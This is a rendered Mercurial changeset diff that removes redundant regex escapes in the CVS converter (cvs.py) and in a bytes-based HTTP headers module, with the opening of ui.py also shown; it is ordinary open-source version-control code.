##// END OF EJS Templates
cleanup: drop redundant character escapes from `[]` character sets...
Matt Harbison -
r44473:6d3b67a8 default
parent child Browse files
Show More
@@ -1,335 +1,333 b''
1 # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
1 # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import errno
9 import errno
10 import os
10 import os
11 import re
11 import re
12 import socket
12 import socket
13
13
14 from mercurial.i18n import _
14 from mercurial.i18n import _
15 from mercurial.pycompat import (
15 from mercurial.pycompat import (
16 getattr,
16 getattr,
17 open,
17 open,
18 )
18 )
19 from mercurial import (
19 from mercurial import (
20 encoding,
20 encoding,
21 error,
21 error,
22 pycompat,
22 pycompat,
23 util,
23 util,
24 )
24 )
25 from mercurial.utils import (
25 from mercurial.utils import (
26 dateutil,
26 dateutil,
27 procutil,
27 procutil,
28 )
28 )
29
29
30 from . import (
30 from . import (
31 common,
31 common,
32 cvsps,
32 cvsps,
33 )
33 )
34
34
35 stringio = util.stringio
35 stringio = util.stringio
36 checktool = common.checktool
36 checktool = common.checktool
37 commit = common.commit
37 commit = common.commit
38 converter_source = common.converter_source
38 converter_source = common.converter_source
39 makedatetimestamp = common.makedatetimestamp
39 makedatetimestamp = common.makedatetimestamp
40 NoRepo = common.NoRepo
40 NoRepo = common.NoRepo
41
41
42
42
43 class convert_cvs(converter_source):
43 class convert_cvs(converter_source):
44 def __init__(self, ui, repotype, path, revs=None):
44 def __init__(self, ui, repotype, path, revs=None):
45 super(convert_cvs, self).__init__(ui, repotype, path, revs=revs)
45 super(convert_cvs, self).__init__(ui, repotype, path, revs=revs)
46
46
47 cvs = os.path.join(path, b"CVS")
47 cvs = os.path.join(path, b"CVS")
48 if not os.path.exists(cvs):
48 if not os.path.exists(cvs):
49 raise NoRepo(_(b"%s does not look like a CVS checkout") % path)
49 raise NoRepo(_(b"%s does not look like a CVS checkout") % path)
50
50
51 checktool(b'cvs')
51 checktool(b'cvs')
52
52
53 self.changeset = None
53 self.changeset = None
54 self.files = {}
54 self.files = {}
55 self.tags = {}
55 self.tags = {}
56 self.lastbranch = {}
56 self.lastbranch = {}
57 self.socket = None
57 self.socket = None
58 self.cvsroot = open(os.path.join(cvs, b"Root"), b'rb').read()[:-1]
58 self.cvsroot = open(os.path.join(cvs, b"Root"), b'rb').read()[:-1]
59 self.cvsrepo = open(os.path.join(cvs, b"Repository"), b'rb').read()[:-1]
59 self.cvsrepo = open(os.path.join(cvs, b"Repository"), b'rb').read()[:-1]
60 self.encoding = encoding.encoding
60 self.encoding = encoding.encoding
61
61
62 self._connect()
62 self._connect()
63
63
64 def _parse(self):
64 def _parse(self):
65 if self.changeset is not None:
65 if self.changeset is not None:
66 return
66 return
67 self.changeset = {}
67 self.changeset = {}
68
68
69 maxrev = 0
69 maxrev = 0
70 if self.revs:
70 if self.revs:
71 if len(self.revs) > 1:
71 if len(self.revs) > 1:
72 raise error.Abort(
72 raise error.Abort(
73 _(
73 _(
74 b'cvs source does not support specifying '
74 b'cvs source does not support specifying '
75 b'multiple revs'
75 b'multiple revs'
76 )
76 )
77 )
77 )
78 # TODO: handle tags
78 # TODO: handle tags
79 try:
79 try:
80 # patchset number?
80 # patchset number?
81 maxrev = int(self.revs[0])
81 maxrev = int(self.revs[0])
82 except ValueError:
82 except ValueError:
83 raise error.Abort(
83 raise error.Abort(
84 _(b'revision %s is not a patchset number') % self.revs[0]
84 _(b'revision %s is not a patchset number') % self.revs[0]
85 )
85 )
86
86
87 d = encoding.getcwd()
87 d = encoding.getcwd()
88 try:
88 try:
89 os.chdir(self.path)
89 os.chdir(self.path)
90
90
91 cache = b'update'
91 cache = b'update'
92 if not self.ui.configbool(b'convert', b'cvsps.cache'):
92 if not self.ui.configbool(b'convert', b'cvsps.cache'):
93 cache = None
93 cache = None
94 db = cvsps.createlog(self.ui, cache=cache)
94 db = cvsps.createlog(self.ui, cache=cache)
95 db = cvsps.createchangeset(
95 db = cvsps.createchangeset(
96 self.ui,
96 self.ui,
97 db,
97 db,
98 fuzz=int(self.ui.config(b'convert', b'cvsps.fuzz')),
98 fuzz=int(self.ui.config(b'convert', b'cvsps.fuzz')),
99 mergeto=self.ui.config(b'convert', b'cvsps.mergeto'),
99 mergeto=self.ui.config(b'convert', b'cvsps.mergeto'),
100 mergefrom=self.ui.config(b'convert', b'cvsps.mergefrom'),
100 mergefrom=self.ui.config(b'convert', b'cvsps.mergefrom'),
101 )
101 )
102
102
103 for cs in db:
103 for cs in db:
104 if maxrev and cs.id > maxrev:
104 if maxrev and cs.id > maxrev:
105 break
105 break
106 id = b"%d" % cs.id
106 id = b"%d" % cs.id
107 cs.author = self.recode(cs.author)
107 cs.author = self.recode(cs.author)
108 self.lastbranch[cs.branch] = id
108 self.lastbranch[cs.branch] = id
109 cs.comment = self.recode(cs.comment)
109 cs.comment = self.recode(cs.comment)
110 if self.ui.configbool(b'convert', b'localtimezone'):
110 if self.ui.configbool(b'convert', b'localtimezone'):
111 cs.date = makedatetimestamp(cs.date[0])
111 cs.date = makedatetimestamp(cs.date[0])
112 date = dateutil.datestr(cs.date, b'%Y-%m-%d %H:%M:%S %1%2')
112 date = dateutil.datestr(cs.date, b'%Y-%m-%d %H:%M:%S %1%2')
113 self.tags.update(dict.fromkeys(cs.tags, id))
113 self.tags.update(dict.fromkeys(cs.tags, id))
114
114
115 files = {}
115 files = {}
116 for f in cs.entries:
116 for f in cs.entries:
117 files[f.file] = b"%s%s" % (
117 files[f.file] = b"%s%s" % (
118 b'.'.join([(b"%d" % x) for x in f.revision]),
118 b'.'.join([(b"%d" % x) for x in f.revision]),
119 [b'', b'(DEAD)'][f.dead],
119 [b'', b'(DEAD)'][f.dead],
120 )
120 )
121
121
122 # add current commit to set
122 # add current commit to set
123 c = commit(
123 c = commit(
124 author=cs.author,
124 author=cs.author,
125 date=date,
125 date=date,
126 parents=[(b"%d" % p.id) for p in cs.parents],
126 parents=[(b"%d" % p.id) for p in cs.parents],
127 desc=cs.comment,
127 desc=cs.comment,
128 branch=cs.branch or b'',
128 branch=cs.branch or b'',
129 )
129 )
130 self.changeset[id] = c
130 self.changeset[id] = c
131 self.files[id] = files
131 self.files[id] = files
132
132
133 self.heads = self.lastbranch.values()
133 self.heads = self.lastbranch.values()
134 finally:
134 finally:
135 os.chdir(d)
135 os.chdir(d)
136
136
137 def _connect(self):
137 def _connect(self):
138 root = self.cvsroot
138 root = self.cvsroot
139 conntype = None
139 conntype = None
140 user, host = None, None
140 user, host = None, None
141 cmd = [b'cvs', b'server']
141 cmd = [b'cvs', b'server']
142
142
143 self.ui.status(_(b"connecting to %s\n") % root)
143 self.ui.status(_(b"connecting to %s\n") % root)
144
144
145 if root.startswith(b":pserver:"):
145 if root.startswith(b":pserver:"):
146 root = root[9:]
146 root = root[9:]
147 m = re.match(
147 m = re.match(r'(?:(.*?)(?::(.*?))?@)?([^:/]*)(?::(\d*))?(.*)', root)
148 r'(?:(.*?)(?::(.*?))?@)?([^:\/]*)(?::(\d*))?(.*)', root
149 )
150 if m:
148 if m:
151 conntype = b"pserver"
149 conntype = b"pserver"
152 user, passw, serv, port, root = m.groups()
150 user, passw, serv, port, root = m.groups()
153 if not user:
151 if not user:
154 user = b"anonymous"
152 user = b"anonymous"
155 if not port:
153 if not port:
156 port = 2401
154 port = 2401
157 else:
155 else:
158 port = int(port)
156 port = int(port)
159 format0 = b":pserver:%s@%s:%s" % (user, serv, root)
157 format0 = b":pserver:%s@%s:%s" % (user, serv, root)
160 format1 = b":pserver:%s@%s:%d%s" % (user, serv, port, root)
158 format1 = b":pserver:%s@%s:%d%s" % (user, serv, port, root)
161
159
162 if not passw:
160 if not passw:
163 passw = b"A"
161 passw = b"A"
164 cvspass = os.path.expanduser(b"~/.cvspass")
162 cvspass = os.path.expanduser(b"~/.cvspass")
165 try:
163 try:
166 pf = open(cvspass, b'rb')
164 pf = open(cvspass, b'rb')
167 for line in pf.read().splitlines():
165 for line in pf.read().splitlines():
168 part1, part2 = line.split(b' ', 1)
166 part1, part2 = line.split(b' ', 1)
169 # /1 :pserver:user@example.com:2401/cvsroot/foo
167 # /1 :pserver:user@example.com:2401/cvsroot/foo
170 # Ah<Z
168 # Ah<Z
171 if part1 == b'/1':
169 if part1 == b'/1':
172 part1, part2 = part2.split(b' ', 1)
170 part1, part2 = part2.split(b' ', 1)
173 format = format1
171 format = format1
174 # :pserver:user@example.com:/cvsroot/foo Ah<Z
172 # :pserver:user@example.com:/cvsroot/foo Ah<Z
175 else:
173 else:
176 format = format0
174 format = format0
177 if part1 == format:
175 if part1 == format:
178 passw = part2
176 passw = part2
179 break
177 break
180 pf.close()
178 pf.close()
181 except IOError as inst:
179 except IOError as inst:
182 if inst.errno != errno.ENOENT:
180 if inst.errno != errno.ENOENT:
183 if not getattr(inst, 'filename', None):
181 if not getattr(inst, 'filename', None):
184 inst.filename = cvspass
182 inst.filename = cvspass
185 raise
183 raise
186
184
187 sck = socket.socket()
185 sck = socket.socket()
188 sck.connect((serv, port))
186 sck.connect((serv, port))
189 sck.send(
187 sck.send(
190 b"\n".join(
188 b"\n".join(
191 [
189 [
192 b"BEGIN AUTH REQUEST",
190 b"BEGIN AUTH REQUEST",
193 root,
191 root,
194 user,
192 user,
195 passw,
193 passw,
196 b"END AUTH REQUEST",
194 b"END AUTH REQUEST",
197 b"",
195 b"",
198 ]
196 ]
199 )
197 )
200 )
198 )
201 if sck.recv(128) != b"I LOVE YOU\n":
199 if sck.recv(128) != b"I LOVE YOU\n":
202 raise error.Abort(_(b"CVS pserver authentication failed"))
200 raise error.Abort(_(b"CVS pserver authentication failed"))
203
201
204 self.writep = self.readp = sck.makefile(b'r+')
202 self.writep = self.readp = sck.makefile(b'r+')
205
203
206 if not conntype and root.startswith(b":local:"):
204 if not conntype and root.startswith(b":local:"):
207 conntype = b"local"
205 conntype = b"local"
208 root = root[7:]
206 root = root[7:]
209
207
210 if not conntype:
208 if not conntype:
211 # :ext:user@host/home/user/path/to/cvsroot
209 # :ext:user@host/home/user/path/to/cvsroot
212 if root.startswith(b":ext:"):
210 if root.startswith(b":ext:"):
213 root = root[5:]
211 root = root[5:]
214 m = re.match(br'(?:([^@:/]+)@)?([^:/]+):?(.*)', root)
212 m = re.match(br'(?:([^@:/]+)@)?([^:/]+):?(.*)', root)
215 # Do not take Windows path "c:\foo\bar" for a connection strings
213 # Do not take Windows path "c:\foo\bar" for a connection strings
216 if os.path.isdir(root) or not m:
214 if os.path.isdir(root) or not m:
217 conntype = b"local"
215 conntype = b"local"
218 else:
216 else:
219 conntype = b"rsh"
217 conntype = b"rsh"
220 user, host, root = m.group(1), m.group(2), m.group(3)
218 user, host, root = m.group(1), m.group(2), m.group(3)
221
219
222 if conntype != b"pserver":
220 if conntype != b"pserver":
223 if conntype == b"rsh":
221 if conntype == b"rsh":
224 rsh = encoding.environ.get(b"CVS_RSH") or b"ssh"
222 rsh = encoding.environ.get(b"CVS_RSH") or b"ssh"
225 if user:
223 if user:
226 cmd = [rsh, b'-l', user, host] + cmd
224 cmd = [rsh, b'-l', user, host] + cmd
227 else:
225 else:
228 cmd = [rsh, host] + cmd
226 cmd = [rsh, host] + cmd
229
227
230 # popen2 does not support argument lists under Windows
228 # popen2 does not support argument lists under Windows
231 cmd = [procutil.shellquote(arg) for arg in cmd]
229 cmd = [procutil.shellquote(arg) for arg in cmd]
232 cmd = procutil.quotecommand(b' '.join(cmd))
230 cmd = procutil.quotecommand(b' '.join(cmd))
233 self.writep, self.readp = procutil.popen2(cmd)
231 self.writep, self.readp = procutil.popen2(cmd)
234
232
235 self.realroot = root
233 self.realroot = root
236
234
237 self.writep.write(b"Root %s\n" % root)
235 self.writep.write(b"Root %s\n" % root)
238 self.writep.write(
236 self.writep.write(
239 b"Valid-responses ok error Valid-requests Mode"
237 b"Valid-responses ok error Valid-requests Mode"
240 b" M Mbinary E Checked-in Created Updated"
238 b" M Mbinary E Checked-in Created Updated"
241 b" Merged Removed\n"
239 b" Merged Removed\n"
242 )
240 )
243 self.writep.write(b"valid-requests\n")
241 self.writep.write(b"valid-requests\n")
244 self.writep.flush()
242 self.writep.flush()
245 r = self.readp.readline()
243 r = self.readp.readline()
246 if not r.startswith(b"Valid-requests"):
244 if not r.startswith(b"Valid-requests"):
247 raise error.Abort(
245 raise error.Abort(
248 _(
246 _(
249 b'unexpected response from CVS server '
247 b'unexpected response from CVS server '
250 b'(expected "Valid-requests", but got %r)'
248 b'(expected "Valid-requests", but got %r)'
251 )
249 )
252 % r
250 % r
253 )
251 )
254 if b"UseUnchanged" in r:
252 if b"UseUnchanged" in r:
255 self.writep.write(b"UseUnchanged\n")
253 self.writep.write(b"UseUnchanged\n")
256 self.writep.flush()
254 self.writep.flush()
257 self.readp.readline()
255 self.readp.readline()
258
256
259 def getheads(self):
257 def getheads(self):
260 self._parse()
258 self._parse()
261 return self.heads
259 return self.heads
262
260
263 def getfile(self, name, rev):
261 def getfile(self, name, rev):
264 def chunkedread(fp, count):
262 def chunkedread(fp, count):
265 # file-objects returned by socket.makefile() do not handle
263 # file-objects returned by socket.makefile() do not handle
266 # large read() requests very well.
264 # large read() requests very well.
267 chunksize = 65536
265 chunksize = 65536
268 output = stringio()
266 output = stringio()
269 while count > 0:
267 while count > 0:
270 data = fp.read(min(count, chunksize))
268 data = fp.read(min(count, chunksize))
271 if not data:
269 if not data:
272 raise error.Abort(
270 raise error.Abort(
273 _(b"%d bytes missing from remote file") % count
271 _(b"%d bytes missing from remote file") % count
274 )
272 )
275 count -= len(data)
273 count -= len(data)
276 output.write(data)
274 output.write(data)
277 return output.getvalue()
275 return output.getvalue()
278
276
279 self._parse()
277 self._parse()
280 if rev.endswith(b"(DEAD)"):
278 if rev.endswith(b"(DEAD)"):
281 return None, None
279 return None, None
282
280
283 args = (b"-N -P -kk -r %s --" % rev).split()
281 args = (b"-N -P -kk -r %s --" % rev).split()
284 args.append(self.cvsrepo + b'/' + name)
282 args.append(self.cvsrepo + b'/' + name)
285 for x in args:
283 for x in args:
286 self.writep.write(b"Argument %s\n" % x)
284 self.writep.write(b"Argument %s\n" % x)
287 self.writep.write(b"Directory .\n%s\nco\n" % self.realroot)
285 self.writep.write(b"Directory .\n%s\nco\n" % self.realroot)
288 self.writep.flush()
286 self.writep.flush()
289
287
290 data = b""
288 data = b""
291 mode = None
289 mode = None
292 while True:
290 while True:
293 line = self.readp.readline()
291 line = self.readp.readline()
294 if line.startswith(b"Created ") or line.startswith(b"Updated "):
292 if line.startswith(b"Created ") or line.startswith(b"Updated "):
295 self.readp.readline() # path
293 self.readp.readline() # path
296 self.readp.readline() # entries
294 self.readp.readline() # entries
297 mode = self.readp.readline()[:-1]
295 mode = self.readp.readline()[:-1]
298 count = int(self.readp.readline()[:-1])
296 count = int(self.readp.readline()[:-1])
299 data = chunkedread(self.readp, count)
297 data = chunkedread(self.readp, count)
300 elif line.startswith(b" "):
298 elif line.startswith(b" "):
301 data += line[1:]
299 data += line[1:]
302 elif line.startswith(b"M "):
300 elif line.startswith(b"M "):
303 pass
301 pass
304 elif line.startswith(b"Mbinary "):
302 elif line.startswith(b"Mbinary "):
305 count = int(self.readp.readline()[:-1])
303 count = int(self.readp.readline()[:-1])
306 data = chunkedread(self.readp, count)
304 data = chunkedread(self.readp, count)
307 else:
305 else:
308 if line == b"ok\n":
306 if line == b"ok\n":
309 if mode is None:
307 if mode is None:
310 raise error.Abort(_(b'malformed response from CVS'))
308 raise error.Abort(_(b'malformed response from CVS'))
311 return (data, b"x" in mode and b"x" or b"")
309 return (data, b"x" in mode and b"x" or b"")
312 elif line.startswith(b"E "):
310 elif line.startswith(b"E "):
313 self.ui.warn(_(b"cvs server: %s\n") % line[2:])
311 self.ui.warn(_(b"cvs server: %s\n") % line[2:])
314 elif line.startswith(b"Remove"):
312 elif line.startswith(b"Remove"):
315 self.readp.readline()
313 self.readp.readline()
316 else:
314 else:
317 raise error.Abort(_(b"unknown CVS response: %s") % line)
315 raise error.Abort(_(b"unknown CVS response: %s") % line)
318
316
319 def getchanges(self, rev, full):
317 def getchanges(self, rev, full):
320 if full:
318 if full:
321 raise error.Abort(_(b"convert from cvs does not support --full"))
319 raise error.Abort(_(b"convert from cvs does not support --full"))
322 self._parse()
320 self._parse()
323 return sorted(pycompat.iteritems(self.files[rev])), {}, set()
321 return sorted(pycompat.iteritems(self.files[rev])), {}, set()
324
322
325 def getcommit(self, rev):
323 def getcommit(self, rev):
326 self._parse()
324 self._parse()
327 return self.changeset[rev]
325 return self.changeset[rev]
328
326
329 def gettags(self):
327 def gettags(self):
330 self._parse()
328 self._parse()
331 return self.tags
329 return self.tags
332
330
333 def getchangedfiles(self, rev, i):
331 def getchangedfiles(self, rev, i):
334 self._parse()
332 self._parse()
335 return sorted(self.files[rev])
333 return sorted(self.files[rev])
@@ -1,185 +1,185 b''
1 """This was forked from cpython's wsgiref.headers module to work on bytes.
1 """This was forked from cpython's wsgiref.headers module to work on bytes.
2
2
3 Header from old file showing copyright is below.
3 Header from old file showing copyright is below.
4
4
5 Much of this module is red-handedly pilfered from email.message in the stdlib,
5 Much of this module is red-handedly pilfered from email.message in the stdlib,
6 so portions are Copyright (C) 2001,2002 Python Software Foundation, and were
6 so portions are Copyright (C) 2001,2002 Python Software Foundation, and were
7 written by Barry Warsaw.
7 written by Barry Warsaw.
8 """
8 """
9
9
10 # Regular expression that matches `special' characters in parameters, the
10 # Regular expression that matches `special' characters in parameters, the
11 # existence of which force quoting of the parameter value.
11 # existence of which force quoting of the parameter value.
12 from __future__ import absolute_import, print_function
12 from __future__ import absolute_import, print_function
13
13
14 import re
14 import re
15
15
16 tspecials = re.compile(br'[ \(\)<>@,;:\\"/\[\]\?=]')
16 tspecials = re.compile(br'[ ()<>@,;:\\"/\[\]?=]')
17
17
18
18
19 def _formatparam(param, value=None, quote=1):
19 def _formatparam(param, value=None, quote=1):
20 """Convenience function to format and return a key=value pair.
20 """Convenience function to format and return a key=value pair.
21 This will quote the value if needed or if quote is true.
21 This will quote the value if needed or if quote is true.
22 """
22 """
23 if value is not None and len(value) > 0:
23 if value is not None and len(value) > 0:
24 if quote or tspecials.search(value):
24 if quote or tspecials.search(value):
25 value = value.replace(b'\\', b'\\\\').replace(b'"', r'\"')
25 value = value.replace(b'\\', b'\\\\').replace(b'"', r'\"')
26 return b'%s="%s"' % (param, value)
26 return b'%s="%s"' % (param, value)
27 else:
27 else:
28 return b'%s=%s' % (param, value)
28 return b'%s=%s' % (param, value)
29 else:
29 else:
30 return param
30 return param
31
31
32
32
33 class Headers(object):
33 class Headers(object):
34 """Manage a collection of HTTP response headers"""
34 """Manage a collection of HTTP response headers"""
35
35
36 def __init__(self, headers=None):
36 def __init__(self, headers=None):
37 headers = headers if headers is not None else []
37 headers = headers if headers is not None else []
38 if type(headers) is not list:
38 if type(headers) is not list:
39 raise TypeError(b"Headers must be a list of name/value tuples")
39 raise TypeError(b"Headers must be a list of name/value tuples")
40 self._headers = headers
40 self._headers = headers
41 if __debug__:
41 if __debug__:
42 for k, v in headers:
42 for k, v in headers:
43 self._convert_string_type(k)
43 self._convert_string_type(k)
44 self._convert_string_type(v)
44 self._convert_string_type(v)
45
45
46 def _convert_string_type(self, value):
46 def _convert_string_type(self, value):
47 """Convert/check value type."""
47 """Convert/check value type."""
48 if type(value) is bytes:
48 if type(value) is bytes:
49 return value
49 return value
50 raise AssertionError(
50 raise AssertionError(
51 u"Header names/values must be"
51 u"Header names/values must be"
52 u" of type bytes (got %s)" % repr(value)
52 u" of type bytes (got %s)" % repr(value)
53 )
53 )
54
54
55 def __len__(self):
55 def __len__(self):
56 """Return the total number of headers, including duplicates."""
56 """Return the total number of headers, including duplicates."""
57 return len(self._headers)
57 return len(self._headers)
58
58
59 def __setitem__(self, name, val):
59 def __setitem__(self, name, val):
60 """Set the value of a header."""
60 """Set the value of a header."""
61 del self[name]
61 del self[name]
62 self._headers.append(
62 self._headers.append(
63 (self._convert_string_type(name), self._convert_string_type(val))
63 (self._convert_string_type(name), self._convert_string_type(val))
64 )
64 )
65
65
66 def __delitem__(self, name):
66 def __delitem__(self, name):
67 """Delete all occurrences of a header, if present.
67 """Delete all occurrences of a header, if present.
68 Does *not* raise an exception if the header is missing.
68 Does *not* raise an exception if the header is missing.
69 """
69 """
70 name = self._convert_string_type(name.lower())
70 name = self._convert_string_type(name.lower())
71 self._headers[:] = [kv for kv in self._headers if kv[0].lower() != name]
71 self._headers[:] = [kv for kv in self._headers if kv[0].lower() != name]
72
72
73 def __getitem__(self, name):
73 def __getitem__(self, name):
74 """Get the first header value for 'name'
74 """Get the first header value for 'name'
75 Return None if the header is missing instead of raising an exception.
75 Return None if the header is missing instead of raising an exception.
76 Note that if the header appeared multiple times, the first exactly which
76 Note that if the header appeared multiple times, the first exactly which
77 occurrence gets returned is undefined. Use getall() to get all
77 occurrence gets returned is undefined. Use getall() to get all
78 the values matching a header field name.
78 the values matching a header field name.
79 """
79 """
80 return self.get(name)
80 return self.get(name)
81
81
82 def __contains__(self, name):
82 def __contains__(self, name):
83 """Return true if the message contains the header."""
83 """Return true if the message contains the header."""
84 return self.get(name) is not None
84 return self.get(name) is not None
85
85
86 def get_all(self, name):
86 def get_all(self, name):
87 """Return a list of all the values for the named field.
87 """Return a list of all the values for the named field.
88 These will be sorted in the order they appeared in the original header
88 These will be sorted in the order they appeared in the original header
89 list or were added to this instance, and may contain duplicates. Any
89 list or were added to this instance, and may contain duplicates. Any
90 fields deleted and re-inserted are always appended to the header list.
90 fields deleted and re-inserted are always appended to the header list.
91 If no fields exist with the given name, returns an empty list.
91 If no fields exist with the given name, returns an empty list.
92 """
92 """
93 name = self._convert_string_type(name.lower())
93 name = self._convert_string_type(name.lower())
94 return [kv[1] for kv in self._headers if kv[0].lower() == name]
94 return [kv[1] for kv in self._headers if kv[0].lower() == name]
95
95
96 def get(self, name, default=None):
96 def get(self, name, default=None):
97 """Get the first header value for 'name', or return 'default'"""
97 """Get the first header value for 'name', or return 'default'"""
98 name = self._convert_string_type(name.lower())
98 name = self._convert_string_type(name.lower())
99 for k, v in self._headers:
99 for k, v in self._headers:
100 if k.lower() == name:
100 if k.lower() == name:
101 return v
101 return v
102 return default
102 return default
103
103
104 def keys(self):
104 def keys(self):
105 """Return a list of all the header field names.
105 """Return a list of all the header field names.
106 These will be sorted in the order they appeared in the original header
106 These will be sorted in the order they appeared in the original header
107 list, or were added to this instance, and may contain duplicates.
107 list, or were added to this instance, and may contain duplicates.
108 Any fields deleted and re-inserted are always appended to the header
108 Any fields deleted and re-inserted are always appended to the header
109 list.
109 list.
110 """
110 """
111 return [k for k, v in self._headers]
111 return [k for k, v in self._headers]
112
112
113 def values(self):
113 def values(self):
114 """Return a list of all header values.
114 """Return a list of all header values.
115 These will be sorted in the order they appeared in the original header
115 These will be sorted in the order they appeared in the original header
116 list, or were added to this instance, and may contain duplicates.
116 list, or were added to this instance, and may contain duplicates.
117 Any fields deleted and re-inserted are always appended to the header
117 Any fields deleted and re-inserted are always appended to the header
118 list.
118 list.
119 """
119 """
120 return [v for k, v in self._headers]
120 return [v for k, v in self._headers]
121
121
122 def items(self):
122 def items(self):
123 """Get all the header fields and values.
123 """Get all the header fields and values.
124 These will be sorted in the order they were in the original header
124 These will be sorted in the order they were in the original header
125 list, or were added to this instance, and may contain duplicates.
125 list, or were added to this instance, and may contain duplicates.
126 Any fields deleted and re-inserted are always appended to the header
126 Any fields deleted and re-inserted are always appended to the header
127 list.
127 list.
128 """
128 """
129 return self._headers[:]
129 return self._headers[:]
130
130
131 def __repr__(self):
131 def __repr__(self):
132 return "%s(%r)" % (self.__class__.__name__, self._headers)
132 return "%s(%r)" % (self.__class__.__name__, self._headers)
133
133
134 def __str__(self):
134 def __str__(self):
135 """str() returns the formatted headers, complete with end line,
135 """str() returns the formatted headers, complete with end line,
136 suitable for direct HTTP transmission."""
136 suitable for direct HTTP transmission."""
137 return b'\r\n'.join(
137 return b'\r\n'.join(
138 [b"%s: %s" % kv for kv in self._headers] + [b'', b'']
138 [b"%s: %s" % kv for kv in self._headers] + [b'', b'']
139 )
139 )
140
140
141 def __bytes__(self):
141 def __bytes__(self):
142 return str(self).encode('iso-8859-1')
142 return str(self).encode('iso-8859-1')
143
143
144 def setdefault(self, name, value):
144 def setdefault(self, name, value):
145 """Return first matching header value for 'name', or 'value'
145 """Return first matching header value for 'name', or 'value'
146 If there is no header named 'name', add a new header with name 'name'
146 If there is no header named 'name', add a new header with name 'name'
147 and value 'value'."""
147 and value 'value'."""
148 result = self.get(name)
148 result = self.get(name)
149 if result is None:
149 if result is None:
150 self._headers.append(
150 self._headers.append(
151 (
151 (
152 self._convert_string_type(name),
152 self._convert_string_type(name),
153 self._convert_string_type(value),
153 self._convert_string_type(value),
154 )
154 )
155 )
155 )
156 return value
156 return value
157 else:
157 else:
158 return result
158 return result
159
159
160 def add_header(self, _name, _value, **_params):
160 def add_header(self, _name, _value, **_params):
161 """Extended header setting.
161 """Extended header setting.
162 _name is the header field to add. keyword arguments can be used to set
162 _name is the header field to add. keyword arguments can be used to set
163 additional parameters for the header field, with underscores converted
163 additional parameters for the header field, with underscores converted
164 to dashes. Normally the parameter will be added as key="value" unless
164 to dashes. Normally the parameter will be added as key="value" unless
165 value is None, in which case only the key will be added.
165 value is None, in which case only the key will be added.
166 Example:
166 Example:
167 h.add_header('content-disposition', 'attachment', filename='bud.gif')
167 h.add_header('content-disposition', 'attachment', filename='bud.gif')
168 Note that unlike the corresponding 'email.message' method, this does
168 Note that unlike the corresponding 'email.message' method, this does
169 *not* handle '(charset, language, value)' tuples: all values must be
169 *not* handle '(charset, language, value)' tuples: all values must be
170 strings or None.
170 strings or None.
171 """
171 """
172 parts = []
172 parts = []
173 if _value is not None:
173 if _value is not None:
174 _value = self._convert_string_type(_value)
174 _value = self._convert_string_type(_value)
175 parts.append(_value)
175 parts.append(_value)
176 for k, v in _params.items():
176 for k, v in _params.items():
177 k = self._convert_string_type(k)
177 k = self._convert_string_type(k)
178 if v is None:
178 if v is None:
179 parts.append(k.replace(b'_', b'-'))
179 parts.append(k.replace(b'_', b'-'))
180 else:
180 else:
181 v = self._convert_string_type(v)
181 v = self._convert_string_type(v)
182 parts.append(_formatparam(k.replace(b'_', b'-'), v))
182 parts.append(_formatparam(k.replace(b'_', b'-'), v))
183 self._headers.append(
183 self._headers.append(
184 (self._convert_string_type(_name), b"; ".join(parts))
184 (self._convert_string_type(_name), b"; ".join(parts))
185 )
185 )
@@ -1,2312 +1,2312 b''
1 # ui.py - user interface bits for mercurial
1 # ui.py - user interface bits for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import getpass
13 import getpass
14 import inspect
14 import inspect
15 import os
15 import os
16 import re
16 import re
17 import signal
17 import signal
18 import socket
18 import socket
19 import subprocess
19 import subprocess
20 import sys
20 import sys
21 import traceback
21 import traceback
22
22
23 from .i18n import _
23 from .i18n import _
24 from .node import hex
24 from .node import hex
25 from .pycompat import (
25 from .pycompat import (
26 getattr,
26 getattr,
27 open,
27 open,
28 setattr,
28 setattr,
29 )
29 )
30
30
31 from . import (
31 from . import (
32 color,
32 color,
33 config,
33 config,
34 configitems,
34 configitems,
35 encoding,
35 encoding,
36 error,
36 error,
37 formatter,
37 formatter,
38 loggingutil,
38 loggingutil,
39 progress,
39 progress,
40 pycompat,
40 pycompat,
41 rcutil,
41 rcutil,
42 scmutil,
42 scmutil,
43 util,
43 util,
44 )
44 )
45 from .utils import (
45 from .utils import (
46 dateutil,
46 dateutil,
47 procutil,
47 procutil,
48 stringutil,
48 stringutil,
49 )
49 )
50
50
51 urlreq = util.urlreq
51 urlreq = util.urlreq
52
52
53 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
53 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
54 _keepalnum = b''.join(
54 _keepalnum = b''.join(
55 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
55 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
56 )
56 )
57
57
58 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
58 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
59 tweakrc = b"""
59 tweakrc = b"""
60 [ui]
60 [ui]
61 # The rollback command is dangerous. As a rule, don't use it.
61 # The rollback command is dangerous. As a rule, don't use it.
62 rollback = False
62 rollback = False
63 # Make `hg status` report copy information
63 # Make `hg status` report copy information
64 statuscopies = yes
64 statuscopies = yes
65 # Prefer curses UIs when available. Revert to plain-text with `text`.
65 # Prefer curses UIs when available. Revert to plain-text with `text`.
66 interface = curses
66 interface = curses
67 # Make compatible commands emit cwd-relative paths by default.
67 # Make compatible commands emit cwd-relative paths by default.
68 relative-paths = yes
68 relative-paths = yes
69
69
70 [commands]
70 [commands]
71 # Grep working directory by default.
71 # Grep working directory by default.
72 grep.all-files = True
72 grep.all-files = True
